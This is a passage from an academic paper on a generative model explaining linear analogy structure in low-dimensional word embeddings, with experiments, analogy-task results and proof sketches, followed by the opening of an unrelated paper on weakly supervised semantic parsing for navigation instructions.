pair a,b satisfying the relation, va −vb is like µR plus some noise vector. This happens for rela- tions satisfying a certain condition described below. Empirical results supporting this theory appear in Section 5, where this linear structure is further lever- aged to slightly improve analogy solving. A side product of our argument will be a mathematical explanation of the empirically well- established superiority of low-dimensional word embeddings over high-dimensional ones in this set- ting (Levy and Goldberg, 2014a). As mentioned ear- lier, the usual explanation that smaller models gen- eralize better is fallacious. We first sketch what was missing in prior attempts to prove versions of RELATIONS=LINES from first principles. The basic issue is approximation er- ror: the difference between the best solution and the 2nd best solution to (4.1) is typically small, whereas the approximation error in the objective in the low- dimensional solutions is larger. For instance, if one uses our PMI objective, then the weighted average of the termwise error in (2.5) is 17%, and the expres- sion in (4.1) above contains six inner products. Thus in principle the approximation error could lead to a failure of the method and the emergence of linear relationship, but it does not. Prior explanations. Pennington et al. (2014) try to propose a model where such linear relationships should occur by design. They posit that queen is a solution to the analogy “man:woman::king:??” be- 5Note that this interpretation has been disputed; e.g., it is argued in Levy and Goldberg (2014a) that (4.1) can be under- stood using only the classical connection between inner product and word similarity, using which the objective (4.1) is slightly improved to a different objective called 3COSMUL. However, this “explanation” is still dogged by the issue of large termwise error pinpointed here, since inner product is only a rough ap- proximation to word similarity. Furthermore, the experiments in Section 5 clearly support the RELATIONS=LINES interpreta- tion. cause p(χ | king) p(χ | queen) ≈ p(χ | man) p(χ | woman), (4.2) where p(χ | king) denotes the conditional proba- bility of seeing word χ in a small window of text around king. Relationship (4.2) is intuitive since both sides will be ≈ 1 for gender-neutral χ like “walks” or “food”, will be > 1 when χ is like “he, Henry” and will be < 1 when χ is like “dress, she, Elizabeth.” This was also observed by Levy and Goldberg (2014a). Given (4.2), they then posit that the correct model describing word embeddings in terms of word occurrences must be a homomorphism from (<d, +) to (<+,×), so vector differences map to ratios of probabilities. This leads to the expres- sion pw,w′ = 〈vw,vw′〉 + bw + bw′, and their method is a (weighted) least squares fit for this expression. One shortcoming of this argument is that the homomorphism assumption assumes the linear relationships instead of explaining them from a more basic principle. More importantly, the empir- ical fit to the homomorphism has nontrivial approx- imation error, high enough that it does not imply the desired strong linear relationships. Levy and Goldberg (2014b) show that empiri- cally, skip-gram vectors satisfy 〈vw,vw′〉≈ PMI(w,w′) (4.3) up to some shift. They also give an argument sug- gesting this relationship must be present if the so- lution is allowed to be very high-dimensional. Un- fortunately, that argument does not extend to low- dimensional embeddings. Even if it did, the issue of termwise approximation error remains. Our explanation. The current paper has intro- duced a generative model to theoretically explain the emergence of relationship (4.3). However, as noted after Theorem 2.2, the issue of high approximation error does not go away either in theory or in the em- pirical fit. We now show that the isotropy of word vectors (assumed in the theoretical model and ver- ified empirically) implies that even a weak version of (4.3) is enough to imply the emergence of the ob- served linear relationships in low-dimensional em- beddings. 391 This argument will assume the analogy in ques- tion involves a relation that obeys Pennington et al.’s suggestion in (4.2). Namely, for such a relation R there exists function νR(·) depending only upon R such that for any a,b satisfying R there is a noise function ξa,b,R(·) for which: p(χ | a) p(χ | b) = νR(χ) · ξa,b,R(χ) (4.4) For different words χ there is huge variation in (4.4), so the multiplicative noise may be large. Our goal is to show that the low-dimensional word embeddings have the property that there is a vector µR such that for every pair of words a,b in that relation, va − vb = µR + noise vector, where the noise vector is small. Taking logarithms of (4.4) results in: log ( p(χ | a) p(χ | b) ) = log(νR(χ)) + ζa,b,R(χ) (4.5) Theorem 2.2 implies that the left-hand side sim- plifies to log ( p(χ|a) p(χ|b) ) = 1 d 〈vχ,va −vb〉 + �a,b(χ) where � captures the small approximation errors in- duced by the inexactness of Theorem 2.2. This adds yet more noise! Denoting by V the n × d matrix whose rows are the vχ vectors, we rewrite (4.5) as: V (va −vb) = d log(νR) + ζ′a,b,R (4.6) where log(νR) in the element-wise log of vector νR and ζ′a,b,R = d(ζa,b,R − �a,b,R) is the noise. In essence, (4.6) shows that va−vb is a solution to a linear regression in d variables and m constraints, with ζ′a,b,R being the “noise.” The design matrix in the regression is V , the matrix of all word vectors, which in our model (as well as empirically) satisfies an isotropy condition. This makes it random-like, and thus solving the regression by left-multiplying by V †, the pseudo-inverse of V , ought to “denoise” effectively. We now show that it does. Our model assumed the set of all word vectors satisfies bulk properties similar to a set of Gaus- sian vectors. The next theorem will only need the following weaker properties. (1) The smallest non- zero singular value of V is larger than some constant c1 times the quadratic mean of the singular values, namely, ‖V‖F/ √ d. Empirically we find c1 ≈ 1/3 holds; see Section 5. (2) The left singular vectors behave like random vectors with respect to ζ′a,b,R, namely, have inner product at most c2‖ζ′a,b,R‖/ √ n with ζ′a,b,R, for some constant c2. (3) The max norm of a row in V is O( √ d). The proof is included in the appendix. Theorem 4.1 (Noise reduction). Under the condi- tions of the previous paragraph, the noise in the dimension-reduced semantic vector space satisfies ‖ζ̄a,b,R‖2 . ‖ζ′a,b,R‖2 √ d n . As a corollary, the relative error in the dimension- reduced space is a factor of √ d/n smaller. 5 Experimental verification In this section, we provide experiments empirically supporting our generative model. Corpus. All word embedding vectors are trained on the English Wikipedia (March 2015 dump). It is pre-processed by standard approach (removing non- textual elements, sentence splitting, and tokeniza- tion), leaving about 3 billion tokens. Words that appeared less than 1000 times in the corpus are ig- nored, resulting in a vocabulary of 68, 430. The co- occurrence is then computed using windows of 10 tokens to each side of the focus word. Training method. Our embedding vectors are trained by optimizing the SN objective using Ada- Grad (Duchi et al., 2011) with initial learning rate of 0.05 and 100 iterations. The PMI objective derived from (2.5) was also used. SN has average (weighted) term-wise error of 5%, and PMI has 17%. We ob- served that SN vectors typically fit the model bet- ter and have better performance, which can be ex- plained by larger errors in PMI, as implied by Theo- rem 2.2. So, we only report the results for SN. For comparison, GloVe and two variants of word2vec (skip-gram and CBOW) vectors are trained. GloVe’s vectors are trained on the same co- occurrence as SN with the default parameter values.6 word2vec vectors are trained using a window size of 10, with other parameters set to default values.7 6http://nlp.stanford.edu/projects/glove/ 7https://code.google.com/p/word2vec/ 392 0.5 1 1.5 2 0 20 40 Partition function value P e rc e n ta g e (a) SN 0.5 1 1.5 2 0 20 40 60 80 100 Partition function value (b) GloVe 0.5 1 1.5 2 0 20 40 60 80 Partition function value (c) CBOW 0.5 1 1.5 2 0 20 40 Partition function value (d) skip-gram Figure 1: The partition function Zc. The figure shows the histogram of Zc for 1000 random vectors c of appropriate norm, as defined in the text. The x-axis is normalized by the mean of the values. The values Zc for different c concentrate around the mean, mostly in [0.9, 1.1]. This concentration phenomenon is predicted by our analysis. 6 8 10 12 14 16 18 1 2 3 4 5 6 7 8 9 10 Natural logarithm of frequency S q u a re d n o rm Figure 2: The linear relationship between the squared norms of our word vectors and the logarithms of the word frequencies. Each dot in the plot corresponds to a word, where x-axis is the natural logarithm of the word fre- quency, and y-axis is the squared norm of the word vec- tor. The Pearson correlation coefficient between the two is 0.75, indicating a significant linear relationship, which strongly supports our mathematical prediction, that is, equation (2.4) of Theorem 2.2. 5.1 Model verification Experiments were run to test our modeling assump- tions. First, we tested two counter-intuitive proper- ties: the concentration of the partition function Zc for different discourse vectors c (see Theorem 2.1), and the random-like behavior of the matrix of word embeddings in terms of its singular values (see The- orem 4.1). For comparison we also tested these properties for word2vec and GloVe vectors, though they are trained by different objectives. Finally, we tested the linear relation between the squared norms of our word vectors and the logarithm of the word frequencies, as implied by Theorem 2.2. Partition function. Our theory predicts the counter-intuitive concentration of the partition func- tion Zc = ∑ w′ exp(c >vw′ ) for a random discourse vector c (see Lemma 2.1). This is verified empiri- cally by picking a uniformly random direction, of norm ‖c‖ = 4/µw, where µw is the average norm of the word vectors.8 Figure 1(a) shows the histogram of Zc for 1000 such randomly chosen c’s for our vectors. The values are concentrated, mostly in the range [0.9, 1.1] times the mean. Concentration is also observed for other types of vectors, especially for GloVe and CBOW. Isotropy with respect to singular values. Our theoretical explanation of RELATIONS=LINES as- sumes that the matrix of word vectors behaves like a random matrix with respect to the properties of singular values. In our embeddings, the quadratic mean of the singular values is 34.3, while the min- imum non-zero singular value of our word vectors is 11. Therefore, the ratio between them is a small constant, consistent with our model. The ratios for GloVe, CBOW, and skip-gram are 1.4, 10.1, and 3.1, respectively, which are also small constants. Squared norms v.s. word frequencies. Figure 2 shows a scatter plot for the squared norms of our vectors and the logarithms of the word frequencies. A linear relationship is observed (Pearson correla- tion 0.75), thus supporting Theorem 2.2. The cor- relation is stronger for high frequency words, pos- sibly because the corresponding terms have higher weights in the training objective. This correlation is much weaker for other types 8Note that our model uses the inner products between the discourse vectors and word vectors, so it is invariant if the dis- course vectors are scaled by s while the word vectors are scaled by 1/s for any s > 0. Therefore, one needs to choose the norm of c properly. We assume ‖c‖µw = √ d/κ ≈ 4 for a constant κ = 5 so that it gives a reasonable fit to the predicted dynamic range of word frequencies according to our theory; see model details in Section 2. 393 Relations SN GloVe CBOW skip-gram G semantic 0.84 0.85 0.79 0.73 syntactic 0.61 0.65 0.71 0.68 total 0.71 0.73 0.74 0.70 M adjective 0.50 0.56 0.58 0.58 noun 0.69 0.70 0.56 0.58 verb 0.48 0.53 0.64 0.56 total 0.53 0.57 0.62 0.57 Table 1: The accuracy on two word analogy task testbeds: G (the GOOGLE testbed); M (the MSR testbed). Per- formance is close to the state of the art despite using a generative model with provable properties. of word embeddings. This is possibly because they have more free parameters (“knobs to turn”), which imbue the embeddings with other properties. This can also cause the difference in the concentration of the partition function for the two methods. 5.2 Performance on analogy tasks We compare the performance of our word vec- tors on analogy tasks, specifically the two testbeds GOOGLE and MSR (Mikolov et al., 2013a; Mikolov et al., 2013c). The for- mer contains 7874 semantic questions such as “man:woman::king:??”, and 10167 syntactic ones such as “run:runs::walk:??.” The latter has 8000 syntactic questions for adjectives, nouns, and verbs. To solve these tasks, we use linear algebraic queries.9 That is, first normalize the vectors to unit norm and then solve “a:b::c:??” by argmin d ‖va −vb −vc + vd‖22 . (5.1) The algorithm succeeds if the best d happens to be correct. The performance of different methods is pre- sented in Table 1. Our vectors achieve performance comparable to the state of art on semantic analogies (similar accuracy as GloVe, better than word2vec). On syntactic tasks, they achieve accuracy 0.04 lower than GloVe and skip-gram, while CBOW typically outperforms the others.10 The reason is probably 9One can instead use the 3COSMUL in (Levy and Goldberg, 2014a), which increases the accuracy by about 3%. But it is not linear while our focus here is the linear algebraic structure. 10It was earlier reported that skip-gram outperforms CBOW (Mikolov et al., 2013a; Pennington et al., 2014). This may be due to the different training data sets and hyperparame- ters used. relation cap-com cap-wor adj-adv opp 1st 0.65 ± 0.07 0.61 ± 0.09 0.35 ± 0.17 0.42 ± 0.16 2nd 0.02 ± 0.28 0.00 ± 0.23 0.07 ± 0.24 0.01 ± 0.25 Table 2: The verification of relation directions on 2 se- mantic and 2 syntactic relations in the GOOGLE testbed. Relations include cap-com: capital-common-countries; cap-wor: capital-world; adj-adv: gram1-adjective-to- adverb; opp: gram2-opposite. For each relation, take vab = va − vb for pairs (a,b) in the relation, and then calculate the top singular vectors of the matrix formed by these vab’s. The row with label “1st”/“2nd” shows the co- sine similarities of individual vab to the 1st/2nd singular vector (the mean and standard deviation). that our model ignores local word order, whereas the other models capture it to some extent. For ex- ample, a word “she” can affect the context by a lot and determine if the next word is “thinks” rather than “think”. Incorporating such linguistic features in the model is left for future work. 5.3 Verifying RELATIONS=LINES The theory in Section 4 predicts the existence of a direction for a relation, whereas earlier Levy and Goldberg (2014a) had questioned if this phe- nomenon is real. The experiment uses the analogy testbed, where each relation is tested using 20 or more analogies. For each relation, we take the set of vectors vab = va −vb where the word pair (a,b) satisfies the relation. Then calculate the top singu- lar vectors of the matrix formed by these vab’s, and compute the cosine similarity (i.e., normalized in- ner product) of individual vab to the singular vec- tors. We observed that most (va − vb)’s are corre- lated with the first singular vector, but have inner products around 0 with the second singular vector. Over all relations, the average projection on the first singular vector is 0.51 (semantic: 0.58; syntactic: 0.46), and the average on the second singular vector is 0.035. For example, Table 2 shows the mean sim- ilarities and standard deviations on the first and sec- ond singular vectors for 4 relations. Similar results are also obtained for word embedings by GloVe and word2vec. Therefore, the first singular vector can be taken as the direction associated with this relation, while the other components are like random noise, in line with our model. 394 SN GloVe CBOW skip-gram w/o RD 0.71 0.73 0.74 0.70 RD(k = 20) 0.74 0.77 0.79 0.75 RD(k = 30) 0.79 0.80 0.82 0.80 RD(k = 40) 0.76 0.80 0.80 0.77 Table 3: The accuracy of the RD algorithm (i.e., the cheater method) on the GOOGLE testbed. The RD al- gorithm is described in the text. For comparison, the row “w/o RD” shows the accuracy of the old method without using RD. Cheating solver for analogy testbeds. The above linear structure suggests a better (but cheating) way to solve the analogy task. This uses the fact that the same semantic relationship (e.g., masculine- feminine, singular-plural) is tested many times in the testbed. If a relation R is represented by a direction µR then the cheating algorithm can learn this direc- tion (via rank 1 SVD) after seeing a few examples of the relationship. Then use the following method of solving “a:b::c:??”: look for a word d such that vc−vd has the largest projection on µR, the relation direction for (a,b). This can boost success rates by about 10%. The testbed can try to combat such cheating by giving analogy questions in a random order. But the cheating algorithm can just cluster the presented analogies to learn which of them are in the same relation. Thus the final algorithm, named analogy solver with relation direction (RD), is: take all vec- tors va − vb for all the word pairs (a,b) presented among the analogy questions and do k-means clus- tering on them; for each (a,b), estimate the rela- tion direction by taking the first singular vector of its cluster, and substitute that for va −vb in (5.1) when solving the analogy. Table 3 shows the performance on GOOGLE with different values of k; e.g. using our SN vectors and k = 30 leads to 0.79 accuracy. Thus future designers of analogy testbeds should re- member not to test the same relationship too many times! This still leaves other ways to cheat, such as learning the directions for interesting semantic rela- tions from other collections of analogies. Non-cheating solver for analogy testbeds. Now we show that even if a relationship is tested only once in the testbed, there is a way to use the above structure. Given “a:b::c:??,” the solver first finds the top 300 nearest neighbors of a and those of SN GloVe CBOW skip-gram w/o RD-nn 0.71 0.73 0.74 0.70 RD-nn (k = 10) 0.71 0.74 0.77 0.73 RD-nn (k = 20) 0.72 0.75 0.77 0.74 RD-nn (k = 30) 0.73 0.76 0.78 0.74 Table 4: The accuracy of the RD-nn algorithm on the GOOGLE testbed. The algorithm is described in the text. For comparison, the row “w/o RD-nn” shows the accu- racy of the old method without using RD-nn. b, and then finds among these neighbors the top k pairs (a′,b′) so that the cosine similarities between va′ −vb′ and va −vb are largest. Finally, the solver uses these pairs to estimate the relation direction (via rank 1 SVD), and substitute this (corrected) estimate for va−vb in (5.1) when solving the analogy. This al- gorithm is named analogy solver with relation direc- tion by nearest neighbors (RD-nn). Table 4 shows its performance, which consistently improves over the old method by about 3%. 6 Conclusions A simple generative model has been introduced to explain the classical PMI based word embedding models, as well as recent variants involving energy- based models and matrix factorization. The model yields an optimization objective with essentially “no knobs to turn”, yet the embeddings lead to good per- formance on analogy tasks, and fit other predictions of our generative model. A model with fewer knobs to turn should be seen as a better scientific explana- tion (Occam’s razor), and certainly makes the em- beddings more interpretable. The spatial isotropy of word vectors is both an assumption in our model, and also a new empir- ical finding of our paper. We feel it may help with further development of language models. It is important for explaining the success of solv- ing analogies via low dimensional vectors (RELA- TIONS=LINES). It also implies that semantic rela- tionships among words manifest themselves as spe- cial directions among word embeddings (Section 4), which lead to a cheater algorithm for solving anal- ogy testbeds. Our model is tailored to capturing semantic sim- ilarity, more akin to a log-linear dynamic topic model. In particular, local word order is unim- 395 portant. Designing similar generative models (with provable and interpretable properties) with linguistic features is left for future work. Acknowledgements We thank the editors of TACL for granting a special relaxation of the page limit for our paper. We thank Yann LeCun, Christopher D. Manning, and Sham Kakade for helpful discussions at various stages of this work. This work was supported in part by NSF grants CCF-1527371, DMS-1317308, Simons Investiga- tor Award, Simons Collaboration Grant, and ONR- N00014-16-1-2329. Tengyu Ma was supported in addition by Simons Award in Theoretical Computer Science and IBM PhD Fellowship. References Jacob Andreas and Dan Klein. 2014. When and why are log-linear models self-normalizing? In Proceedings of the Annual Meeting of the North American Chapter of the Association for Computational Linguistics. Sanjeev Arora, Yuanzhi Li, Yingyu Liang, Tengyu Ma, and Andrej Risteski. 2015. A latent variable model approach to PMI-based word embeddings. Technical report, ArXiV. http://arxiv.org/abs/1502.03520. Sanjeev Arora, Yuanzhi Li, Yingyu Liang, Tengyu Ma, and Andrej Risteski. 2016. Linear al- gebraic structure of word senses, with applica- tions to polysemy. Technical report, ArXiV. http://arxiv.org/abs/1502.03520. David Belanger and Sham M. Kakade. 2015. A linear dynamical system model for text. In Proceedings of the 32nd International Conference on Machine Learn- ing. Yoshua Bengio, Holger Schwenk, Jean-Sébastien Senécal, Fréderic Morin, and Jean-Luc Gauvain. 2006. Neural probabilistic language models. In Innovations in Machine Learning. Fischer Black and Myron Scholes. 1973. The pricing of options and corporate liabilities. Journal of Political Economy. David M. Blei and John D. Lafferty. 2006. Dynamic topic models. In Proceedings of the 23rd International Conference on Machine Learning. David M. Blei. 2012. Probabilistic topic models. Com- munication of the Association for Computing Machin- ery. Kenneth Ward Church and Patrick Hanks. 1990. Word association norms, mutual information, and lexicogra- phy. Computational linguistics. Shay B. Cohen, Karl Stratos, Michael Collins, Dean P. Foster, and Lyle Ungar. 2012. Spectral learning of latent-variable PCFGs. In Proceedings of the 50th Annual Meeting of the Association for Computational Linguistics: Long Papers-Volume 1. Ronan Collobert and Jason Weston. 2008a. A uni- fied architecture for natural language processing: Deep neural networks with multitask learning. In Proceed- ings of the 25th International Conference on Machine Learning. Ronan Collobert and Jason Weston. 2008b. A uni- fied architecture for natural language processing: Deep neural networks with multitask learning. In Proceed- ings of the 25th International Conference on Machine Learning. Scott C. Deerwester, Susan T Dumais, Thomas K. Lan- dauer, George W. Furnas, and Richard A. Harshman. 1990. Indexing by latent semantic analysis. Journal of the American Society for Information Science. John Duchi, Elad Hazan, and Yoram Singer. 2011. Adaptive subgradient methods for online learning and stochastic optimization. The Journal of Machine Learning Research. John Rupert Firth. 1957. A synopsis of linguistic theory. Amir Globerson, Gal Chechik, Fernando Pereira, and Naftali Tishby. 2007. Euclidean embedding of co- occurrence data. Journal of Machine Learning Re- search. Tatsunori B. Hashimoto, David Alvarez-Melis, and Tommi S. Jaakkola. 2016. Word embeddings as met- ric recovery in semantic spaces. Transactions of the Association for Computational Linguistics. Thomas Hofmann. 1999. Probabilistic latent semantic analysis. In Proceedings of the Fifteenth Conference on Uncertainty in Artificial Intelligence. Daniel Hsu, Sham M. Kakade, and Tong Zhang. 2012. A spectral algorithm for learning hidden markov models. Journal of Computer and System Sciences. Omer Levy and Yoav Goldberg. 2014a. Linguistic regu- larities in sparse and explicit word representations. In Proceedings of the Eighteenth Conference on Compu- tational Natural Language Learning. Omer Levy and Yoav Goldberg. 2014b. Neural word em- bedding as implicit matrix factorization. In Advances in Neural Information Processing Systems. Andrew L. Maas, Raymond E. Daly, Peter T. Pham, Dan Huang, Andrew Y. Ng, and Christopher Potts. 2011. Learning word vectors for sentiment analysis. In The 49th Annual Meeting of the Association for Computa- tional Linguistics. 396 Yariv Maron, Michael Lamar, and Elie Bienenstock. 2010. Sphere embedding: An application to part-of- speech induction. In Advances in Neural Information Processing Systems. Tomas Mikolov, Kai Chen, Greg Corrado, and Jeffrey Dean. 2013a. Efficient estimation of word representa- tions in vector space. Proceedings of the International Conference on Learning Representations. Tomas Mikolov, Ilya Sutskever, Kai Chen, Greg S. Cor- rado, and Jeff Dean. 2013b. Distributed represen- tations of words and phrases and their composition- ality. In Advances in Neural Information Processing Systems. Tomas Mikolov, Wen-tau Yih, and Geoffrey Zweig. 2013c. Linguistic regularities in continuous space word representations. In Proceedings of the Confer- ence of the North American Chapter of the Associa- tion for Computational Linguistics: Human Language Technologies. Andriy Mnih and Geoffrey Hinton. 2007. Three new graphical models for statistical language modelling. In Proceedings of the 24th International Conference on Machine Learning. Christos H. Papadimitriou, Hisao Tamaki, Prabhakar Raghavan, and Santosh Vempala. 1998. Latent se- mantic indexing: A probabilistic analysis. In Proceed- ings of the 7th ACM SIGACT-SIGMOD-SIGART Sym- posium on Principles of Database Systems. Jeffrey Pennington, Richard Socher, and Christopher D. Manning. 2014. Glove: Global vectors for word rep- resentation. Proceedings of the Empiricial Methods in Natural Language Processing. Douglas L. T. Rohde, Laura M. Gonnerman, and David C. Plaut. 2006. An improved model of seman- tic similarity based on lexical co-occurence. Commu- nication of the Association for Computing Machinery. David E. Rumelhart, Geoffrey E. Hinton, and James L. McClelland, editors. 1986. Parallel Distributed Pro- cessing: Explorations in the Microstructure of Cogni- tion. David E. Rumelhart, Geoffrey E. Hinton, and Ronald J. Williams. 1988. Learning representations by back- propagating errors. Cognitive modeling. Peter D. Turney and Patrick Pantel. 2010. From fre- quency to meaning: Vector space models of semantics. Journal of Artificial Intelligence Research. A Proof sketches Here we provide the proof sketches, while the com- plete proof can be found in the full version (Arora et al., 2015). Proof sketch of Theorem 2.2 Let w and w′ be two arbitrary words. Let c and c′ denote two consecutive context vectors, where c ∼ C and c′|c is defined by the Markov kernel p(c′ | c). We start by using the law of total expectation, in- tegrating out the hidden variables c and c′: p(w,w′) = E c,c′ [ Pr[w,w′|c,c′] ] = E c,c′ [p(w|c)p(w′|c′)] = E c,c′ [ exp(〈vw,c〉) Zc exp(〈vw′,c′〉) Zc′ ] (A.1) An expectation like (A.1) would normally be dif- ficult to analyze because of the partition functions. However, we can assume the inequality (2.2), that is, the partition function typically does not vary much for most of context vectors c. Let F be the event that both c and c′ are within (1 ± �z)Z. Then by (2.2) and the union bound, event F happens with proba- bility at least 1 − 2 exp(−Ω(log2 n)). We will split the right-hand side (RHS) of (A.1) into the parts ac- cording to whether F happens or not. RHS of (A.1) = E c,c′ [ exp(〈vw,c〉) Zc exp(〈vw′,c′〉) Zc′ 1F ] ︸︷︷︸ T1 + E c,c′ [ exp(〈vw,c〉) Zc exp(〈vw′,c′〉) Zc′ 1F̄ ] ︸︷︷︸ T2 (A.2) where F̄ denotes the complement of event F and 1F and 1F̄ denote indicator functions for F and F̄ , respectively. When F happens, we can replace Zc by Z with a 1 ± �z factor loss: The first term of the RHS of (A.2) equals to T1 = 1 ±O(�z) Z2 E c,c′ [ exp(〈vw,c〉) exp(〈vw′,c′〉)1F ] (A.3) On the other hand, we can use E[1F̄ ] = Pr[F̄] ≤ exp(−Ω(log2 n)) to show that the second term of RHS of (A.2) is negligible, |T2| = exp(−Ω(log1.8 n)) . (A.4) 397 This claim must be handled somewhat carefully since the RHS does not depend on d at all. Briefly, the reason this holds is as follows: in the regime when d is small ( √ d = o(log2 n)), any word vec- tor vw and discourse c satisfies that exp(〈vw,c〉) ≤ exp(‖vw‖) = exp(O( √ d)), and since E[1F̄ ] = exp(−Ω(log2 n)), the claim follows directly; In the regime when d is large ( √ d = Ω(log2 n)), we can use concentration inequalities to show that except with a small probability exp(−Ω(d)) = exp(−Ω(log2 n)), a uniform sample from the sphere behaves equivalently to sampling all of the coor- dinates from a standard Gaussian distribution with mean 0 and variance 1 d , in which case the claim is not too difficult to show using Gaussian tail bounds. Therefore it suffices to only consider (A.3). Our model assumptions state that c and c′ cannot be too different. We leverage that by rewriting (A.3) a little, and get that it equals T1 = 1 ±O(�z) Z2 E c [ exp(〈vw,c〉) E c′|c [ exp(〈vw′,c′〉) ] ] = 1 ±O(�z) Z2 E c [exp(〈vw,c〉)A(c)] (A.5) where A(c) := E c′|c [ exp(〈vw′,c′〉) ] . We claim that A(c) = (1 ± O(�2)) exp(〈vw′,c〉). Doing some al- gebraic manipulations, A(c) = exp(〈vw′,c〉) E c′|c [ exp(〈vw′,c′ − c〉) ] . Furthermore, by our model assumptions, ‖c−c′‖≤ �2/ √ d. So 〈vw,c− c′〉≤ ‖vw‖‖c− c′‖ = O(�2) and thus A(c) = (1 ± O(�2)) exp(〈vw′,c〉). Plug- ging the simplification of A(c) to (A.5), T1 = 1 ±O(�z) Z2 E[exp(〈vw + vw′,c〉)]. (A.6) Since c has uniform distribution over the sphere, the random variable 〈vw + vw′,c〉 has distribution pretty similar to Gaussian distribution N(0,‖vw + vw′‖2/d), especially when d is relatively large. Ob- serve that E[exp(X)] has a closed form for Gaussian random variable X ∼N(0,σ2), E[exp(X)] = ∫ x 1 σ √ 2π exp(− x 2 2σ2 ) exp(x)dx = exp(σ2/2) . (A.7) Bounding the difference between 〈vw + vw′,c〉 from Gaussian random variable, we can show that for � = Õ(1/d), E[exp(〈vw + vw′,c〉)] = (1 ± �) exp ( ‖vw + vw′‖2 2d ) . (A.8) Therefore, the series of simplifica- tion/approximation above (concretely, combining equations (A.1), (A.2), (A.4), (A.6), and (A.8)) lead to the desired bound on log p(w,w′) for the case when the window size q = 2. The bound on log p(w) can be shown similarly. Proof sketch of Lemma 2.1 Note that for fixed c, when word vectors have Gaussian priors assumed as in our model, Zc = ∑ w exp(〈vw,c〉) is a sum of independent random variables. We first claim that using proper concentration of measure tools, it can be shown that the vari- ance of Zc are relatively small compared to its mean Evw [Zc], and thus Zc concentrates around its mean. Note this is quite non-trivial: the ran- dom variable exp(〈vw,c〉) is neither bounded nor subgaussian/sub-exponential, since the tail is ap- proximately inverse poly-logarithmic instead of in- verse exponential. In fact, the same concentration phenomenon does not happen for w. The occur- rence probability of word w is not necessarily con- centrated because the `2 norm of vw can vary a lot in our model, which allows the frequency of the words to have a large dynamic range. So now it suffices to show that Evw [Zc] for differ- ent c are close to each other. Using the fact that the word vector directions have a Gaussian distribution, Evw [Zc] turns out to only depend on the norm of c (which is equal to 1). More precisely, E vw [Zc] = f(‖c‖22) = f(1) (A.9) where f is defined as f(α) = nEs[exp(s2α/2)] and s has the same distribution as the norms of the word 398 vectors. We sketch the proof of this. In our model, vw = sw · v̂w, where v̂w is a Gaussian vector with identity covariance I. Then E vw [Zc] = n E vw [exp(〈vw,c〉)] = n E sw [ E vw|sw [exp(〈vw,c〉) | sw] ] where the second line is just an application of the law of total expectation, if we pick the norm of the (random) vector vw first, followed by its direction. Conditioned on sw, 〈vw,c〉 is a Gaussian random variable with variance ‖c‖22s2w, and therefore using similar calculation as in (A.7), we have E vw|sw [exp(〈vw,c〉) | sw] = exp(s2‖c‖22/2) . Hence, Evw [Zc] = nEs[exp(s 2‖c‖22/2)] as needed. Proof of Theorem 4.1 The proof uses the standard analysis of linear regression. Let V = PΣQT be the SVD of V and let σ1, . . . ,σd be the left singular val- ues of V (the diagonal entries of Σ). For notational ease we omit the subscripts in ζ̄ and ζ′ since they are not relevant for this proof. Since V † = QΣ−1PT and thus ζ̄ = V †ζ′ = QΣ−1PTζ′, we have ‖ζ̄‖2 ≤ σ−1d ‖P Tζ′‖2. (A.10) We claim σ−1d ≤ √ 1 c1n . (A.11) Indeed, ∑d i=1 σ 2 i = O(nd), since the average squared norm of a word vector is d. The claim then follows from the first assumption. Furthermore, by the second assumption, ‖PTζ′‖∞ ≤ c2√n‖ζ ′‖2, so ‖PTζ′‖22 ≤ c22d n ‖ζ′‖22. (A.12) Plugging (A.11) and (A.12) into (A.10), we get ‖ζ̄‖2 ≤ √ 1 c1n √ c22d n ‖ζ′‖22 = c2 √ d √ c1n ‖ζ′‖2 as desired. The last statement follows because the norm of the signal, which is d log(νR) originally and is V †d log(νR) = va−vb after dimension reduction, also gets reduced by a factor of √ n. 399 400 work_hn3zcuyx55c5hluvhowvnqdplm ---- Transactions of the Association for Computational Linguistics, 1 (2013) 49–62. Action Editor: Jason Eisner. Submitted 11/2012; Published 3/2013. c©2013 Association for Computational Linguistics. Weakly Supervised Learning of Semantic Parsers for Mapping Instructions to Actions Yoav Artzi and Luke Zettlemoyer Computer Science & Engineering University of Washington Seattle, WA 98195 {yoav,lsz}@cs.washington.edu Abstract The context in which language is used pro- vides a strong signal for learning to recover its meaning. In this paper, we show it can be used within a grounded CCG semantic parsing approach that learns a joint model of mean- ing and context for interpreting and executing natural language instructions, using various types of weak supervision. The joint nature provides crucial benefits by allowing situated cues, such as the set of visible objects, to di- rectly influence learning. It also enables algo- rithms that learn while executing instructions, for example by trying to replicate human ac- tions. Experiments on a benchmark naviga- tional dataset demonstrate strong performance under differing forms of supervision, includ- ing correctly executing 60% more instruction sets relative to the previous state of the art. 1 Introduction The context in which natural language is used pro- vides a strong signal to reason about its meaning. However, using such a signal to automatically learn to understand unrestricted natural language remains a challenging, unsolved problem. For example, consider the instructions in Figure 1. Correct interpretation requires us to solve many sub- problems, such as resolving all referring expres- sions to specific objects in the environment (includ- ing, “the corner” or “the third intersection”), disam- biguating word sense based on context (e.g., “the chair” could refer to a chair or sofa), and finding executable action sequences that satisfy stated con- straints (such as “twice” or “to face the blue hall”). move forward twice to the chair λa.move(a) ∧dir(a,forward) ∧ len(a, 2) ∧ to(a,ιx.chair(x)) at the corner turn left to face the blue hall λa.pre(a,ιx.corner(x)) ∧ turn(a) ∧dir(a,left) ∧ post(a,front(you,ιx.blue(x) ∧hall(x))) move to the chair in the third intersection λa.move(a) ∧ to(a,ιx.sofa(x)) ∧ intersect(order(λy.junction(y),frontdist, 3),x) Figure 1: A sample navigation instruction set, paired with lambda-calculus meaning representations. We must also understand implicit requests, for ex- ample from the phrase “at the corner,” that describe goals to be achieved without specifying the specific steps. Finally, to do all of this robustly without pro- hibitive engineering effort, we need grounded learn- ing approaches that jointly reason about meaning and context to learn directly from their interplay, with as little human intervention as possible. Although many of these challenges have been studied separately, as we will review in Section 3, this paper represents, to the best of our knowledge, the first attempt at a comprehensive model that ad- dresses them all. Our approach induces a weighted Combinatory Categorial Grammar (CCG), includ- ing both the parameters of the linear model and a CCG lexicon. To model complex instructional lan- guage, we introduce a new semantic modeling ap- proach that can represent a number of key linguistic constructs that are common in spatial and instruc- tional language. To learn from indirect supervision, we define the notion of a validation function, for example that tests the state of the agent after in- terpreting an instruction. We then show how this function can be used to drive online learning. For 49 that purpose, we adapt the loss-sensitive Perceptron algorithm (Singh-Miller & Collins, 2007; Artzi & Zettlemoyer, 2011) to use a validation function and coarse-to-fine inference for lexical induction. The joint nature of this approach provides crucial benefits in that it allows situated cues, such as the set of visible objects, to directly influence parsing and learning. It also enables the model to be learned while executing 